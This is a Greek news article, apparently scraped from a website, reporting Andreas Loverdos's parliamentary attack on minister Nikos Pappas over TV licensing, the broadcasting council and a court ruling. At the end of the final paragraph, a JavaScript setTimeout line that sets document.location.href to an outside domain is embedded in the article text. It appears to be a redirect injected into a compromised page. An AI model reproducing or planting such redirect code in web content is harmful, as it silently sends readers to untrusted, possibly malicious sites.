Λοβέρδος προς Παππά: Ας είχατε υποβάλει την παραίτησή σας και ας μην την έκανε δεκτή ο πρωθυπουργός

0
7

 

«Δεν πρέπει να ξεχνιόμαστε. Η δικαιοσύνη μίλησε, η δημοκρατία νίκησε και το μαύρο δεν πέρασε», είπε ο κοινοβουλευτικός εκπρόσωπος της Δημοκρατικής Συμπαράταξης Ανδρέας Λοβέρδος και σχολίασε ότι «το μαύρο που ήθελε να περάσει η κυβέρνηση στα κανάλια δεν πέρασε ως μέθοδος δημοκρατικής τακτικής».

«Κάποιοι πιαστήκανε με τη γίδα στην πλάτη, με όσα έγιναν γνωστά σχετικά με τις αδειοδοτήσεις της Τράπεζας Αττικής», είπε. Κατηγόρησε την κυβέρνηση διότι επιτέθηκε στη δικαιοσύνη, αναφέρθηκε στην τροπολογία που είχε αποσυρθεί για το κλείσιμο καναλιών εντός πέντε ημερών από τη δημοσίευση στο ΦΕΚ, στην πρόταση για τον κ. Πολύδωρα. Κατηγόρησε τον Νίκο Παππά ότι τινάζει την επιβαλλόμενη από το Σύνταγμα συναίνεση, με τα όσα δήλωσε σήμερα στον ΣΚΑΪ.

«Μπήκατε νέος άνθρωπος στην πολιτική, αλλά νομίζατε ότι όλα μπορείτε να τα κάνετε επειδή αυξήθηκε η δύναμη σας. Αν είχατε υποβάλει την παραίτησή σας, δεν θα χρειαζόταν να προσπαθείτε καθημερινά να σώσετε το πολιτικό σας κεφάλαιο. Επί 14 μήνες έχετε αναστατώσει τη χώρα. Ας είχατε υποβάλει την παραίτησή σας και ας μην την έκανε δεκτή ο πρωθυπουργός», είπε απευθυνόμενος στον υπουργό Επικρατείας, τον οποίο κατηγόρησε ότι προσπάθησε να στήσει τη δική του ενημέρωση.

«Μην λέτε άλλα ψέματα. Σας άκουσα σήμερα να λέτε ότι η διοίκηση του ΕΣΡ ήταν παράτυπη. Έχω μπροστά μου απόφαση του ΣτΕ, το οποίο λέει ότι η παράταση της θητείας των μελών του ΕΣΡ δεν παραβιάζει το Σύνταγμα», είπε και πρόσθεσε: «H συναίνεση που είναι εφικτή στη διάσκεψη δεν αφορά τον υπουργό, διότι έχει αυτά τα πεπραγμένα». Ανέφερε ακόμη, ότι αν η κυβέρνηση αντικαταστήσει τη λέξη «αναστολή» με τη λέξη «κατάργηση» του 2Α, αυτό θα είναι μια πράξη που θα βοηθήσει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here